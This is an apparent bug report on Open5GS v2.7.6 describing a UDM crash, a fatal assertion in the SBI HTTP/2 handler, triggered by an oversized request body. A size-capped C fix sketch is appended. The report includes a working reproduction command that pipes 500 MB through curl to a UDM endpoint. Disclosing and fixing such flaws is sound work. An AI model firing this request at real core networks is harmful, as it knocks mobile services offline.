[Bug]: UDM crashes due to unbounded request body size leading to fatal assertion in SBI HTTP/2 handler #4265

@longx24

Description

Open5GS Release, Revision, or Tag

v2.7.6

Steps to reproduce

python3 -c "import sys; sys.stdout.buffer.write(b'A' * (500 * 1024 * 1024))" |
  curl -v --http2-prior-knowledge \
    -X PATCH \
    'http://127.0.0.12:7777/nudm-pp/v1/imsi-001010000000001/pp-data' \
    -H 'Content-Type: application/json-patch+json' \
    --data-binary @-

Logs

09/08 13:27:32.716: [sbi] FATAL: on_data_chunk_recv: Assertion `request->http.content_length == 0' failed. (../lib/sbi/nghttp2-server.c:1460)
09/08 13:27:32.716: [core] FATAL: backtrace() returned 9 addresses (../lib/core/ogs-abort.c:37)

Expected behaviour

The UDM should gracefully reject the malformed request and return an appropriate HTTP error response (e.g., 400 Bad Request).

Observed Behaviour

The UDM process attempts to buffer the entire request body in memory.
When memory allocation fails, a fatal assertion is triggered in the SBI HTTP/2 handler, causing the UDM process to terminate and resulting in a Denial of Service.

eNodeB/gNodeB

No response

UE Models and versions

No response
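
The behaviour the report asks for, sketched as an added example (not Open5GS code and not part of the original issue): a request-body accumulator that enforces a size cap and reports oversize or allocation failure as an HTTP status instead of asserting. The names `body_buf_t`, `body_check_declared`, `body_append`, `body_free` and the 1 MiB `MAX_BODY_LEN` are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical cap chosen for this example; not an Open5GS setting. */
#define MAX_BODY_LEN ((size_t)1024 * 1024)

typedef struct {
    char *data;   /* accumulated body, NULL until the first chunk */
    size_t len;   /* bytes stored so far, never above MAX_BODY_LEN */
} body_buf_t;

/* Result doubles as the HTTP status to send; 0 means "keep receiving". */
enum { BODY_OK = 0, BODY_TOO_LARGE = 413, BODY_NO_MEMORY = 500 };

/* Check a declared Content-Length before any buffering happens. */
int body_check_declared(uint64_t content_length)
{
    return content_length > MAX_BODY_LEN ? BODY_TOO_LARGE : BODY_OK;
}

/* Append one DATA chunk. Oversized input and allocation failure are
 * returned to the caller rather than asserted on. */
int body_append(body_buf_t *b, const uint8_t *chunk, size_t chunk_len)
{
    char *p;

    /* Subtraction form: the comparison cannot overflow size_t. */
    if (chunk_len > MAX_BODY_LEN - b->len)
        return BODY_TOO_LARGE;
    if (chunk_len == 0)
        return BODY_OK;

    p = realloc(b->data, b->len + chunk_len + 1);
    if (p == NULL)
        return BODY_NO_MEMORY;  /* old buffer still valid; caller frees it */

    memcpy(p + b->len, chunk, chunk_len);
    b->len += chunk_len;
    p[b->len] = '\0';
    b->data = p;
    return BODY_OK;
}

void body_free(body_buf_t *b)
{
    free(b->data);
    b->data = NULL;
    b->len = 0;
}
```

A non-zero result is meant to become the response status for that stream, after which the buffer is released with `body_free` and the process keeps serving other requests.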
